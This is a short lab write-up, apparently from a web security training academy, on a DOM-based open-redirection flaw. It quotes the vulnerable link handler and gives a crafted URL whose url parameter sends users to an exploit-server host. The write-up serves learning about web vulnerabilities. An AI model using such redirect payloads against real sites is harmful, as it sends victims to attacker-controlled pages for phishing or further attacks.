DOM-based open redirection

Description

This lab contains a DOM-based open-redirection vulnerability.

Reproduction and proof of concept

Analysis:

<div class="is-linkback">
    <a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = "/"'>Back to Blog</a>
</div>

The url parameter allows changing the Back to Blog link in a Blog page.

Construct a URL for redirecting the user to the exploit server:

https://0aee00de0391e705c3631bd500ca0028.web-security-academy.net/post?postId=1&url=https://exploit-0a18009403e3e7cec36e1a18019700ff.exploit-server.net/

Paste this url in browser and hit enter.

Exploitability

An attacker needs to exploit this vulnerability and redirect the victim to an exploit server.